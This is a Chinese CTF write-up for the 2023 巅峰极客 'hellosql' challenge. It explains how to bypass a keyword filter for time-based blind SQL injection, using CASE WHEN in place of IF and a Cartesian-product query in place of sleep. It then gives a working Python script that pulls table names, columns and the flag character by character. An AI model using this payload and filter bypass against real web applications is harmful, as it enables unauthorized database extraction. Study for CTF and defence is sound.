2023巅峰极客hellosql writeup

2023巅峰极客hellosql writeup

经过简单fuzz一下发现过滤了

* sleep union benchmark count if 

为什么偏偏就过滤和时间盲注有点的关键词呢，我感觉是考时间盲注的bypass，禁用了sleep，benchmark和count(*),想到了get_lock,而这题就是考的笛卡尔积,碰到知识盲区了没做出来,赛后学了一下笛卡尔积时间盲注,查漏补缺了一下时间盲注的方法,都写这在我博客的这篇文章了时间盲注的方法

if过滤用case…when…then…end代替,count(*)可以用其他的聚合函数(avg,sum,min,max)绕过,这里用max

import requests  
import time  
url = 'http://web-83bfbb55f8.challenge.xctf.org.cn/index.php'  
flag = ''  
  
for i in range(1, 100):  
    high = 127  
    low = 32  
    mid = (low + high) // 2  
    while high > low:  
        #payload = "' or case when ascii(SUBSTR((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid)  #表名为Flllag  
        #payload = "' or case when ascii(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flllag'),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) #字段只有一个是Flagg  
        payload = "' or case when ascii(SUBSTR((select(group_concat(Flagg))from(Flllag)),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) #查数据  
        data = {"id": payload, }  
        last = time.time()  
        response = requests.get(url, params=data)  
        now = time.time()  
        if now - last >= 0.5:  
            low = mid + 1  
        else:  
            high = mid  
        mid = (low + high) // 2  
    if mid==32 or mid==127:  
        break  
    print(i)  
    flag += chr(mid)  
    print("flag:" + flag)  
print(flag)